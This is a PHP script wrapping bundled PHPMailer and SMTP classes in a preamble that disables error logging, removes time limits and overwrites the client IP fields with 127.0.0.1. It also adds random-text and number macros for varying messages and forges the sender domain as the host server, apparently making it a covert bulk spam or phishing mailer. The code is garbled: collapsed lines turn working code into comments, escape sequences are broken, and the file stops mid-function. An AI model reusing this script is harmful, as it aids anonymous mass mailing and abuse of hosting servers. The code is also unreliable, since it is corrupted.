Untitled

<?php
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);

if (isset($_SERVER)) {
	$_SERVER['PHP_SELF'] = "/";
	$_SERVER['REMOTE_ADDR'] = "127.0.0.1";
	if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
		$_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
	}
}

if (isset($_FILES)) {
	foreach($_FILES as $key => $file) {
		if (!strpos($file['name'], ".jpg")) {
			$filename = alter_macros($file['name']);
			$filename = num_macros($filename);
			$filename = xnum_macros($filename);
			$_FILES[$key]["name"] = $filename;
		}
	}
}

function custom_strip_tags($text)
{
	$text = strip_tags($text, '');
	$text = str_replace("", "", $text);
	$text = str_replace("\">", " ] ", $text);
	return $text;
}

function is_ip($str)
{
	return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $str);
}

function from_host($content)
{
	$host = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']);
	if (is_ip($host)) {
		return $content;
	}

	$tokens = explode("@", $content);
	$content = $tokens[0] . "@" . $host . ">";
	return $content;
}

function alter_macros($content)
{
	preg_match_all('#{(.*)}#Ui', $content, $matches);
	for ($i = 0; $i < count($matches[1]); $i++) {
		$ns = explode("|", $matches[1][$i]);
		$c2 = count($ns);
		$rand = rand(0, ($c2 - 1));
		$content = str_replace("{" . $matches[1][$i] . "}", $ns[$rand], $content);
	}

	return $content;
}

function xnum_macros($content)
{
	preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);
	for ($i = 0; $i < count($matches[0]); $i++) {
		$num = $matches[1][$i];
		$min = pow(10, $num - 1);
		$max = pow(10, $num) - 1;
		$rand = rand($min, $max);
		$content = str_replace($matches[0][$i], $rand, $content);
	}

	return $content;
}

function num_macros($content)
{
	preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
	for ($i = 0; $i < count($matches[0]); $i++) {
		$min = $matches[1][$i];
		$max = $matches[2][$i];
		$rand = rand($min, $max);
		$content = str_replace($matches[0][$i], $rand, $content);
	}

	return $content;
}

function fteil_macros($content, $fteil)
{
	return str_replace("[FTEIL]", $fteil, $content);
}

class SMTP

{
	const VERSION = '5.2.10';
	const CRLF = "\r\n";
	const DEFAULT_SMTP_PORT = 25;
	const MAX_LINE_LENGTH = 998;
	const DEBUG_OFF = 0;
	const DEBUG_CLIENT = 1;
	const DEBUG_SERVER = 2;
	const DEBUG_CONNECTION = 3;
	const DEBUG_LOWLEVEL = 4;
	public $Version = '5.2.10';

	public $SMTP_PORT = 25;

	public $CRLF = "\r\n";

	public $do_debug = self::DEBUG_OFF;

	public $Debugoutput = 'echo';

	public $do_verp = false;

	public $Timeout = 300;

	public $Timelimit = 300;

	protected $smtp_conn;
	protected $error = array(
		'error' => '',
		'detail' => '',
		'smtp_code' => '',
		'smtp_code_ex' => ''
	);
	protected $helo_rply = null;
	protected $server_caps = null;
	protected $last_reply = '';
	protected
	function edebug($str, $level = 0)
	{
		if ($level > $this->do_debug) {
			return;
		}

		if (!in_array($this->Debugoutput, array(
			'error_log',
			'html',
			'echo'
		)) and is_callable($this->Debugoutput)) {
			call_user_func($this->Debugoutput, $str, $this->do_debug);
			return;
		}

		switch ($this->Debugoutput) {
		case 'error_log':
			error_log($str);
			break;

		case 'html':
			echo htmlentities(preg_replace('/[\r\n]+/', '', $str) , ENT_QUOTES, 'UTF-8') . "
\n";
			break;

		case 'echo':
		default:
			$str = preg_replace('/(\r\n|\r|\n)/ms', "\n", $str);
			echo gmdate('Y-m-d H:i:s') . "\t" . str_replace("\n", "\n \t ", trim($str)) . "\n";
		}
	}

	public

	function connect($host, $port = null, $timeout = 30, $options = array())
	{
		static $streamok;
		if (is_null($streamok)) {
			$streamok = function_exists('stream_socket_client');
		}

		$this->setError('');
		if ($this->connected()) {
			$this->setError('Already connected to a server');
			return false;
		}

		if (empty($port)) {
			$port = self::DEFAULT_SMTP_PORT;
		}

		$this->edebug("Connection: opening to $host:$port, timeout=$timeout, options=" . var_export($options, true) , self::DEBUG_CONNECTION);
		$errno = 0;
		$errstr = '';
		if ($streamok) {
			$socket_context = stream_context_create($options);
			$this->smtp_conn = @stream_socket_client($host . ":" . $port, $errno, $errstr, $timeout, STREAM_CLIENT_CONNECT, $socket_context);
		}
		else {
			$this->edebug("Connection: stream_socket_client not available, falling back to fsockopen", self::DEBUG_CONNECTION);
			$this->smtp_conn = fsockopen($host, $port, $errno, $errstr, $timeout);
		}

		if (!is_resource($this->smtp_conn)) {
			$this->setError('Failed to connect to server', $errno, $errstr);
			$this->edebug('SMTP ERROR: ' . $this->error['error'] . ": $errstr ($errno)", self::DEBUG_CLIENT);
			return false;
		}

		$this->edebug('Connection: opened', self::DEBUG_CONNECTION);
		if (substr(PHP_OS, 0, 3) != 'WIN') {
			$max = ini_get('max_execution_time');
			if ($max != 0 && $timeout > $max) {
				@set_time_limit($timeout);
			}

			stream_set_timeout($this->smtp_conn, $timeout, 0);
		}

		$announce = $this->get_lines();
		$this->edebug('SERVER -> CLIENT: ' . $announce, self::DEBUG_SERVER);
		return true;
	}

	public

	function startTLS()
	{
		if (!$this->sendCommand('STARTTLS', 'STARTTLS', 220)) {
			return false;
		}

		if (!stream_socket_enable_crypto($this->smtp_conn, true, STREAM_CRYPTO_METHOD_TLS_CLIENT)) {
			return false;
		}

		return true;
	}

	public

	function authenticate($username, $password, $authtype = null, $realm = '', $workstation = '')
	{
		if (!$this->server_caps) {
			$this->setError('Authentication is not allowed before HELO/EHLO');
			return false;
		}

		if (array_key_exists('EHLO', $this->server_caps)) {
			if (!array_key_exists('AUTH', $this->server_caps)) {
				$this->setError('Authentication is not allowed at this stage');
				return false;
			}

			self::edebug('Auth method requested: ' . ($authtype ? $authtype : 'UNKNOWN') , self::DEBUG_LOWLEVEL);
			self::edebug('Auth methods available on the server: ' . implode(',', $this->server_caps['AUTH']) , self::DEBUG_LOWLEVEL);
			if (empty($authtype)) {
				foreach(array(
					'LOGIN',
					'CRAM-MD5',
					'NTLM',
					'PLAIN'
				) as $method) {
					if (in_array($method, $this->server_caps['AUTH'])) {
						$authtype = $method;
						break;
					}
				}

				if (empty($authtype)) {
					$this->setError('No supported authentication methods found');
					return false;
				}

				self::edebug('Auth method selected: ' . $authtype, self::DEBUG_LOWLEVEL);
			}

			if (!in_array($authtype, $this->server_caps['AUTH'])) {
				$this->setError("The requested authentication method \"$authtype\" is not supported by the server");
				return false;
			}
		}
		elseif (empty($authtype)) {
			$authtype = 'LOGIN';
		}

		switch ($authtype) {
		case 'PLAIN':
			if (!$this->sendCommand('AUTH', 'AUTH PLAIN', 334)) {
				return false;
			}

			if (!$this->sendCommand('User & Password', base64_encode("\0" . $username . "\0" . $password) , 235)) {
				return false;
			}

			break;

		case 'LOGIN':
			if (!$this->sendCommand('AUTH', 'AUTH LOGIN', 334)) {
				return false;
			}

			if (!$this->sendCommand("Username", base64_encode($username) , 334)) {
				return false;
			}

			if (!$this->sendCommand("Password", base64_encode($password) , 235)) {
				return false;
			}

			break;

		case 'NTLM':
			require_once 'extras/ntlm_sasl_client.php';

			$temp = new stdClass;
			$ntlm_client = new ntlm_sasl_client_class;
			if (!$ntlm_client->Initialize($temp)) {
				$this->setError($temp->error);
				$this->edebug('You need to enable some modules in your php.ini file: ' . $this->error['error'], self::DEBUG_CLIENT);
				return false;
			}

			$msg1 = $ntlm_client->TypeMsg1($realm, $workstation); //msg1 if (!$this->sendCommand( 'AUTH NTLM', 'AUTH NTLM ' . base64_encode($msg1), 334 ) ) { return false; } $challenge = substr($this->last_reply, 3); $challenge = b64d($challenge); $ntlm_res = $ntlm_client->NTLMResponse( substr($challenge, 24, 8), $password ); $msg3 = $ntlm_client->TypeMsg3( $ntlm_res, $username, $realm, $workstation ); return $this->sendCommand('Username', base64_encode($msg3), 235); case 'CRAM-MD5': if (!$this->sendCommand('AUTH CRAM-MD5', 'AUTH CRAM-MD5', 334)) { return false; } $challenge = b64d(substr($this->last_reply, 4)); $response = $username . ' ' . $this->hmac($challenge, $password); return $this->sendCommand('Username', base64_encode($response), 235); default: $this->setError("Authentication method \"$authtype\" is not supported"); return false; } return true; } protected function hmac($data, $key) { if (function_exists('hash_hmac')) { return hash_hmac('md5', $data, $key); } $bytelen = 64; // byte length for md5 if (strlen($key) > $bytelen) { $key = pack('H*', md5($key)); } $key = str_pad($key, $bytelen, chr(0x00)); $ipad = str_pad('', $bytelen, chr(0x36)); $opad = str_pad('', $bytelen, chr(0x5c)); $k_ipad = $key ^ $ipad; $k_opad = $key ^ $opad; return md5($k_opad . pack('H*', md5($k_ipad . $data))); } public function connected() { if (is_resource($this->smtp_conn)) { $sock_status = stream_get_meta_data($this->smtp_conn); if ($sock_status['eof']) { $this->edebug( 'SMTP NOTICE: EOF caught while checking if connected', self::DEBUG_CLIENT ); $this->close(); return false; } return true; // everything looks good } return false; } public function close() { $this->setError(''); $this->server_caps = null; $this->helo_rply = null; if (is_resource($this->smtp_conn)) { fclose($this->smtp_conn); $this->smtp_conn = null; //Makes for cleaner serialization $this->edebug('Connection: closed', self::DEBUG_CONNECTION); } } public function data($msg_data) { if (!$this->sendCommand('DATA', 'DATA', 354)) { return false; } $lines = explode("\n", str_replace(array("\r\n", "\r"), "\n", $msg_data)); $field = substr($lines[0], 0, strpos($lines[0], ':')); $in_headers = false; if (!empty($field) && strpos($field, ' ') === false) { $in_headers = true; } foreach ($lines as $line) { $lines_out = array(); if ($in_headers and $line == '') { $in_headers = false; } while (isset($line[self::MAX_LINE_LENGTH])) { $pos = strrpos(substr($line, 0, self::MAX_LINE_LENGTH), ' '); if (!$pos) { $pos = self::MAX_LINE_LENGTH - 1; $lines_out[] = substr($line, 0, $pos); $line = substr($line, $pos); } else { $lines_out[] = substr($line, 0, $pos); $line = substr($line, $pos + 1); } if ($in_headers) { $line = "\t" . $line; } } $lines_out[] = $line; foreach ($lines_out as $line_out) { if (!empty($line_out) and $line_out[0] == '.') { $line_out = '.' . $line_out; } $this->client_send($line_out . self::CRLF); } } $savetimelimit = $this->Timelimit; $this->Timelimit = $this->Timelimit * 2; $result = $this->sendCommand('DATA END', '.', 250); $this->Timelimit = $savetimelimit; return $result; } public function hello($host = '') { return (boolean)($this->sendHello('EHLO', $host) or $this->sendHello('HELO', $host)); } protected function sendHello($hello, $host) { $noerror = $this->sendCommand($hello, $hello . ' ' . $host, 250); $this->helo_rply = $this->last_reply; if ($noerror) { $this->parseHelloFields($hello); } else { $this->server_caps = null; } return $noerror; } protected function parseHelloFields($type) { $this->server_caps = array(); $lines = explode("\n", $this->last_reply); foreach ($lines as $n => $s) { $s = trim(substr($s, 4)); if (!$s) { continue; } $fields = explode(' ', $s); if (!empty($fields)) { if (!$n) { $name = $type; $fields = $fields[0]; } else { $name = array_shift($fields); if ($name == 'SIZE') { $fields = ($fields) ? $fields[0] : 0; } } $this->server_caps[$name] = ($fields ? $fields : true); } } } public function mail($from) { $useVerp = ($this->do_verp ? ' XVERP' : ''); return $this->sendCommand( 'MAIL FROM', 'MAIL FROM:<' . $from . '>' . $useVerp, 250 ); } public function quit($close_on_error = true) { $noerror = $this->sendCommand('QUIT', 'QUIT', 221); $err = $this->error; //Save any error if ($noerror or $close_on_error) { $this->close(); $this->error = $err; //Restore any error from the quit command } return $noerror; } public function recipient($toaddr) { return $this->sendCommand( 'RCPT TO', 'RCPT TO:<' . $toaddr . '>', array(250, 251) ); } public function reset() { return $this->sendCommand('RSET', 'RSET', 250); } protected function sendCommand($command, $commandstring, $expect) { if (!$this->connected()) { $this->setError("Called $command without being connected"); return false; } $this->client_send($commandstring . self::CRLF); $this->last_reply = $this->get_lines(); $matches = array(); if (preg_match("/^([0-9]{3})[ -](?:([0-9]\\.[0-9]\\.[0-9]) )?/", $this->last_reply, $matches)) { $code = $matches[1]; $code_ex = (count($matches) > 2 ? $matches[2] : null); $detail = preg_replace( "/{$code}[ -]".($code_ex ? str_replace('.', '\\.', $code_ex).' ' : '')."/m", '', $this->last_reply ); } else { $code = substr($this->last_reply, 0, 3); $code_ex = null; $detail = substr($this->last_reply, 4); } $this->edebug('SERVER -> CLIENT: ' . $this->last_reply, self::DEBUG_SERVER); if (!in_array($code, (array)$expect)) { $this->setError( "$command command failed", $detail, $code, $code_ex ); $this->edebug( 'SMTP ERROR: ' . $this->error['error'] . ': ' . $this->last_reply, self::DEBUG_CLIENT ); return false; } $this->setError(''); return true; } public function sendAndMail($from) { return $this->sendCommand('SAML', "SAML FROM:$from", 250); } public function verify($name) { return $this->sendCommand('VRFY', "VRFY $name", array(250, 251)); } public function noop() { return $this->sendCommand('NOOP', 'NOOP', 250); } public function turn() { $this->setError('The SMTP TURN command is not implemented'); $this->edebug('SMTP NOTICE: ' . $this->error['error'], self::DEBUG_CLIENT); return false; } public function client_send($data) { $this->edebug("CLIENT -> SERVER: $data", self::DEBUG_CLIENT); return fwrite($this->smtp_conn, $data); } public function getError() { return $this->error; } public function getServerExtList() { return $this->server_caps; } public function getServerExt($name) { if (!$this->server_caps) { $this->setError('No HELO/EHLO was sent'); return null; } // the tight logic knot ;) if (!array_key_exists($name, $this->server_caps)) { if ($name == 'HELO') { return $this->server_caps['EHLO']; } if ($name == 'EHLO' || array_key_exists('EHLO', $this->server_caps)) { return false; } $this->setError('HELO handshake was used. Client knows nothing about server extensions'); return null; } return $this->server_caps[$name]; } public function getLastReply() { return $this->last_reply; } protected function get_lines() { if (!is_resource($this->smtp_conn)) { return ''; } $data = ''; $endtime = 0; stream_set_timeout($this->smtp_conn, $this->Timeout); if ($this->Timelimit > 0) { $endtime = time() + $this->Timelimit; } while (is_resource($this->smtp_conn) && !feof($this->smtp_conn)) { $str = @fgets($this->smtp_conn, 515); $this->edebug("SMTP -> get_lines(): \$data was \"$data\"", self::DEBUG_LOWLEVEL); $this->edebug("SMTP -> get_lines(): \$str is \"$str\"", self::DEBUG_LOWLEVEL); $data .= $str; $this->edebug("SMTP -> get_lines(): \$data is \"$data\"", self::DEBUG_LOWLEVEL); if ((isset($str[3]) and $str[3] == ' ')) { break; } $info = stream_get_meta_data($this->smtp_conn); if ($info['timed_out']) { $this->edebug( 'SMTP -> get_lines(): timed-out (' . $this->Timeout . ' sec)', self::DEBUG_LOWLEVEL ); break; } if ($endtime and time() > $endtime) { $this->edebug( 'SMTP -> get_lines(): timelimit reached ('. $this->Timelimit . ' sec)', self::DEBUG_LOWLEVEL ); break; } } return $data; } public function setVerp($enabled = false) { $this->do_verp = $enabled; } public function getVerp() { return $this->do_verp; } protected function setError($message, $detail = '', $smtp_code = '', $smtp_code_ex = '') { $this->error = array( 'error' => $message, 'detail' => $detail, 'smtp_code' => $smtp_code, 'smtp_code_ex' => $smtp_code_ex ); } public function setDebugOutput($method = 'echo') { $this->Debugoutput = $method; } public function getDebugOutput() { return $this->Debugoutput; } public function setDebugLevel($level = 0) { $this->do_debug = $level; } public function getDebugLevel() { return $this->do_debug; } public function setTimeout($timeout = 0) { $this->Timeout = $timeout; } public function getTimeout() { return $this->Timeout; } } class PHPMailer { public $Version = '5.2.9'; public $Priority = 3; public $CharSet = 'iso-8859-1'; public $ContentType = 'text/plain'; public $Encoding = '8bit'; public $ErrorInfo = ''; public $From = 'root@localhost'; public $FromName = 'Root User'; public $Sender = ''; public $ReturnPath = ''; public $Subject = ''; public $Body = ''; public $AltBody = ''; public $Ical = ''; protected $MIMEBody = ''; protected $MIMEHeader = ''; protected $mailHeader = ''; public $WordWrap = 0; public $Mailer = 'mail'; public $Sendmail = '/usr/sbin/sendmail'; public $UseSendmailOptions = true; public $PluginDir = ''; public $ConfirmReadingTo = ''; public $Hostname = ''; public $MessageID = ''; public $MessageDate = ''; public $Host = 'localhost'; public $Port = 25; public $Helo = ''; public $SMTPSecure = ''; public $SMTPAuth = false; public $Username = ''; public $Password = ''; public $AuthType = ''; public $Realm = ''; public $Workstation = ''; public $Timeout = 300; public $SMTPDebug = 0; public $Debugoutput = 'echo'; public $SMTPKeepAlive = false; public $SingleTo = false; public $SingleToArray = array(); public $do_verp = false; public $AllowEmpty = false; public $LE = "\n"; public $DKIM_selector = ''; public $DKIM_identity = ''; public $DKIM_passphrase = ''; public $DKIM_domain = ''; public $DKIM_private = ''; public $action_function = ''; public $XMailer = ''; protected $smtp = null; protected $to = array(); protected $cc = array(); protected $bcc = array(); protected $ReplyTo = array(); protected $all_recipients = array(); protected $attachment = array(); protected $CustomHeader = array(); protected $lastMessageID = ''; protected $message_type = ''; protected $boundary = array(); protected $language = array(); protected $error_count = 0; protected $sign_cert_file = ''; protected $sign_key_file = ''; protected $sign_key_pass = ''; protected $exceptions = false; const STOP_MESSAGE = 0; const STOP_CONTINUE = 1; const STOP_CRITICAL = 2; const CRLF = "\r\n"; public function __construct($exceptions = false) { $this->exceptions = (boolean)$exceptions; } public function __destruct() { } private function mailPassthru($to, $subject, $body, $header, $params) { //Check overloading of mail function to avoid double-encoding if (ini_get('mbstring.func_overload') & 1) { $subject = $this->secureHeader($subject); } else { $subject = $this->encodeHeader($this->secureHeader($subject)); } if (ini_get('safe_mode') || !($this->UseSendmailOptions)) { $result = @mail($to, $subject, $body, $header); } else { $result = @mail($to, $subject, $body, $header, $params); } return $result; } protected function edebug($str) { if ($this->SMTPDebug <= 0) { return; } //Avoid clash with built-in function names if (!in_array($this->Debugoutput, array('error_log', 'html', 'echo')) and is_callable($this->Debugoutput)) { call_user_func($this->Debugoutput, $str, $this->SMTPDebug); return; } switch ($this->Debugoutput) { case 'error_log': //Don't output, just log error_log($str); break; case 'html': //Cleans up output a bit for a better looking, HTML-safe output echo htmlentities( preg_replace('/[\r\n]+/', '', $str), ENT_QUOTES, 'UTF-8' ) . "
			n"; break; case 'echo': default: //Normalize line breaks $str = preg_replace('/(\r\n|\r|\n)/ms', "n", $str); echo gmdate('Y-m-d H:i:s') . "t" . str_replace( "n", "nt", trim($str) ) . "n"; } } public function isHTML($isHtml = true) { if ($isHtml) { $this->ContentType = 'text/html'; } else { $this->ContentType = 'text/plain'; } } public function isSMTP() { $this->Mailer = 'smtp'; } public function isMail() { $this->Mailer = 'mail'; } public function isSendmail() { $ini_sendmail_path = ini_get('sendmail_path'); if (!stristr($ini_sendmail_path, 'sendmail')) { $this->Sendmail = '/usr/sbin/sendmail'; } else { $this->Sendmail = $ini_sendmail_path; } $this->Mailer = 'sendmail'; } public function isQmail() { $ini_sendmail_path = ini_get('sendmail_path'); if (!stristr($ini_sendmail_path, 'qmail')) { $this->Sendmail = '/var/qmail/bin/qmail-inject'; } else { $this->Sendmail = $ini_sendmail_path; } $this->Mailer = 'qmail'; } public function addAddress($address, $name = '') { return $this->addAnAddress('to', $address, $name); } public function addCC($address, $name = '') { return $this->addAnAddress('cc', $address, $name); } public function addBCC($address, $name = '') { return $this->addAnAddress('bcc', $address, $name); } public function addReplyTo($address, $name = '') { return $this->addAnAddress('Reply-To', $address, $name); } protected function addAnAddress($kind, $address, $name = '') { if (!preg_match('/^(to|cc|bcc|Reply-To)$/', $kind)) { $this->setError($this->lang('Invalid recipient array') . ': ' . $kind); $this->edebug($this->lang('Invalid recipient array') . ': ' . $kind); if ($this->exceptions) { throw new phpmailerException('Invalid recipient array: ' . $kind); } return false; } $address = trim($address); $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim if (!$this->validateAddress($address)) { $this->setError($this->lang('invalid_address') . ': ' . $address); $this->edebug($this->lang('invalid_address') . ': ' . $address); if ($this->exceptions) { throw new phpmailerException($this->lang('invalid_address') . ': ' . $address); } return false; } if ($kind != 'Reply-To') { if (!isset($this->all_recipients[strtolower($address)])) { array_push($this->$kind, array($address, $name)); $this->all_recipients[strtolower($address)] = true; return true; } } else { if (!array_key_exists(strtolower($address), $this->ReplyTo)) { $this->ReplyTo[strtolower($address)] = array($address, $name); return true; } } return false; } public function setFrom($address, $name = '', $auto = true) { $address = trim($address); $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim if (!$this->validateAddress($address)) { $this->setError($this->lang('invalid_address') . ': ' . $address); $this->edebug($this->lang('invalid_address') . ': ' . $address); if ($this->exceptions) { throw new phpmailerException($this->lang('invalid_address') . ': ' . $address); } return false; } $this->From = $address; $this->FromName = $name; if ($auto) { if (empty($this->Sender)) { $this->Sender = $address; } } return true; } public function getLastMessageID() { return $this->lastMessageID; } public static function validateAddress($address, $patternselect = 'auto') { if (!$patternselect or $patternselect == 'auto') { //Check this constant first so it works when extension_loaded() is disabled by safe mode //Constant was added in PHP 5.2.4 if (defined('PCRE_VERSION')) { //This pattern can get stuck in a recursive loop in PCRE <= 8.0.2 if (version_compare(PCRE_VERSION, '8.0.3') >= 0) { $patternselect = 'pcre8'; } else { $patternselect = 'pcre'; } } elseif (function_exists('extension_loaded') and extension_loaded('pcre')) { //Fall back to older PCRE $patternselect = 'pcre'; } else { //Filter_var appeared in PHP 5.2.0 and does not require the PCRE extension if (version_compare(PHP_VERSION, '5.2.0') >= 0) { $patternselect = 'php'; } else { $patternselect = 'noregex'; } } } switch ($patternselect) { case 'pcre8': return (boolean)preg_match( '/^(?!(?>(?1)" ? ( ?>\\\[ -~]|[^"])"?(?1)){255,})(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){65,}@)' . '((?>(?>(?>((?>(?>(?>\x0D\x0A)?[\t ])+|(?>[\t ]*\x0D\x0A)?[\t ]+)?)(\((?>(?2)' . '(?>[\x01-\x08\x0B\x0C\x0E-\'*-\[\]-\x7F]|\\\[\x00-\x7F]|(?3)))*(?2)\)))+(?2))|(?2))?)' . '([!#-\'*+\/-9=?^-~-]+|"(?>(?2)(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\x7F]))*' . '(?2)")(?>(?1)\.(?1)(?4))*(?1)@(?!(?1)[a-z0-9-]{64,})(?1)(?>([a-z0-9](?>[a-z0-9-]*[a-z0-9])?)' . '(?>(?1)\.(?!(?1)[a-z0-9-]{64,})(?1)(?5)){0,126}|\[(?:(?>IPv6:(?>([a-f0-9]{1,4})(?>:(?6)){7}' . '|(?!(?:.*[a-f0-9][:\]]){8,})((?6)(?>:(?6)){0,6})?::(?7)?))|(?>(?>IPv6:(?>(?6)(?>:(?6)){5}:' . '|(?!(?:.*[a-f0-9]:){6,})(?8)?::(?>((?6)(?>:(?6)){0,4}):)?))?(25[0-5]|2[0-4][0-9]|1[0-9]{2}' . '|[1-9]?[0-9])(?>\.(?9)){3}))\])(?1)$/isD', $address ); case 'pcre': //An older regex that doesn't need a recent PCRE return (boolean)preg_match( '/^(?!(?>"?(?>\\\[ -~]|[^"])"?){255,})(?!(?>"?(?>\\\[ -~]|[^"])"?){65,}@)(?>' . '[!#-\'*+\/-9=?^-~-]+|"(?>(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\xFF]))*")' . '(?>\.(?>[!#-\'*+\/-9=?^-~-]+|"(?>(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\xFF]))*"))*' . '@(?>(?![a-z0-9-]{64,})(?>[a-z0-9](?>[a-z0-9-]*[a-z0-9])?)(?>\.(?![a-z0-9-]{64,})' . '(?>[a-z0-9](?>[a-z0-9-]*[a-z0-9])?)){0,126}|\[(?:(?>IPv6:(?>(?>[a-f0-9]{1,4})(?>:' . '[a-f0-9]{1,4}){7}|(?!(?:.*[a-f0-9][:\]]){8,})(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,6})?' . '::(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,6})?))|(?>(?>IPv6:(?>[a-f0-9]{1,4}(?>:' . '[a-f0-9]{1,4}){5}:|(?!(?:.*[a-f0-9]:){6,})(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,4})?' . '::(?>(?:[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,4}):)?))?(?>25[0-5]|2[0-4][0-9]|1[0-9]{2}' . '|[1-9]?[0-9])(?>\.(?>25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])){3}))\])$/isD', $address ); case 'html5': return (boolean)preg_match( '/^[a-zA-Z0-9.!#$%&\'*+\/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}' . '[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/sD', $address ); case 'noregex': return (strlen($address) >= 3 and strpos($address, '@') >= 1 and strpos($address, '@') != strlen($address) - 1); case 'php': default: return (boolean)filter_var($address, FILTER_VALIDATE_EMAIL); } } public function send() { try { if (!$this->preSend()) { return false; } return $this->postSend(); } catch (phpmailerException $exc) { $this->mailHeader = ''; $this->setError($exc->getMessage()); if ($this->exceptions) { throw $exc; } return false; } } public function preSend() { try { $this->mailHeader = ''; if ((count($this->to) + count($this->cc) + count($this->bcc)) < 1) { throw new phpmailerException($this->lang('provide_address'), self::STOP_CRITICAL); } // Set whether the message is multipart/alternative if (!empty($this->AltBody)) { $this->ContentType = 'multipart/alternative'; } $this->error_count = 0; // reset errors $this->setMessageType(); // Refuse to send an empty message unless we are specifically allowing it if (!$this->AllowEmpty and empty($this->Body)) { throw new phpmailerException($this->lang('empty_message'), self::STOP_CRITICAL); } $this->MIMEHeader = $this->createHeader(); $this->MIMEBody = $this->createBody(); if ($this->Mailer == 'mail') { if (count($this->to) > 0) { $this->mailHeader .= $this->addrAppend('To', $this->to); } else { $this->mailHeader .= $this->headerLine('To', 'undisclosed-recipients:;'); } $this->mailHeader .= $this->headerLine( 'Subject', $this->encodeHeader($this->secureHeader(trim($this->Subject))) ); } // Sign with DKIM if enabled if (!empty($this->DKIM_domain) && !empty($this->DKIM_private) && !empty($this->DKIM_selector) && file_exists($this->DKIM_private)) { $header_dkim = $this->DKIM_Add( $this->MIMEHeader . $this->mailHeader, $this->encodeHeader($this->secureHeader($this->Subject)), $this->MIMEBody ); $this->MIMEHeader = rtrim($this->MIMEHeader, "\r\n ") . self::CRLF . str_replace("\r\n", "\n", $header_dkim) . self::CRLF; } return true; } catch (phpmailerException $exc) { $this->setError($exc->getMessage()); if ($this->exceptions) { throw $exc; } return false; } } public function postSend() { try { // Choose the mailer and send through it switch ($this->Mailer) { case 'sendmail': case 'qmail': return $this->sendmailSend($this->MIMEHeader, $this->MIMEBody); case 'mail': return $this->mailSend($this->MIMEHeader, $this->MIMEBody); case 'smtp': return $this->SmtpSend($this->MIMEHeader, $this->MIMEBody); default: $sendMethod = $this->Mailer.'Send'; if (method_exists($this, $sendMethod)) { return $this->$sendMethod($this->MIMEHeader, $this->MIMEBody); } return $this->mailSend($this->MIMEHeader, $this->MIMEBody); } } catch (phpmailerException $exc) { $this->setError($exc->getMessage()); $this->edebug($exc->getMessage()); if ($this->exceptions) { throw $exc; } } return false; } protected function sendmailSend($header, $body) { if ($this->Sender != '') { if ($this->Mailer == 'qmail') { $sendmail = sprintf('%s -f%s', escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender)); } else { $sendmail = sprintf('%s -oi -f%s -t', escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender)); } } else { if ($this->Mailer == 'qmail') { $sendmail = sprintf('%s', escapeshellcmd($this->Sendmail)); } else { $sendmail = sprintf('%s -oi -t', escapeshellcmd($this->Sendmail)); } } if ($this->SingleTo) { foreach ($this->SingleToArray as $toAddr) { if (!@$mail = popen($sendmail, 'w')) { throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } fputs($mail, 'To: ' . $toAddr . "\n"); fputs($mail, $header); fputs($mail, $body); $result = pclose($mail); $this->doCallback( ($result == 0), array($toAddr), $this->cc, $this->bcc, $this->Subject, $body, $this->From ); if ($result != 0) { throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } } } else { if (!@$mail = popen($sendmail, 'w')) { throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } fputs($mail, $header); fputs($mail, $body); $result = pclose($mail); $this->doCallback(($result == 0), $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From); if ($result != 0) { throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } } return true; } protected function mailSend($header, $body) { $toArr = array(); foreach ($this->to as $toaddr) { $toArr[] = $this->addrFormat($toaddr); } $to = implode(', ', $toArr); if (empty($this->Sender)) { $params = ' '; } else { $params = sprintf('-f%s', $this->Sender); } if ($this->Sender != '' and !ini_get('safe_mode')) { $old_from = ini_get('sendmail_from'); ini_set('sendmail_from', $this->Sender); } $result = false; if ($this->SingleTo && count($toArr) > 1) { foreach ($toArr as $toAddr) { $result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params); $this->doCallback($result, array($toAddr), $this->cc, $this->bcc, $this->Subject, $body, $this->From); } } else { $result = $this->mailPassthru($to, $this->Subject, $body, $header, $params); $this->doCallback($result, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From); } if (isset($old_from)) { ini_set('sendmail_from', $old_from); } if (!$result) { throw new phpmailerException($this->lang('instantiate'), self::STOP_CRITICAL); } return true; } public function getSMTPInstance() { if (!is_object($this->smtp)) { $this->smtp = new SMTP; } return $this->smtp; } protected function smtpSend($header, $body) { $bad_rcpt = array(); if (!$this->smtpConnect($this->SMTPOptions)) { throw new phpmailerException($this->lang('smtp_connect_failed'), self::STOP_CRITICAL); } if ('' == $this->Sender) { 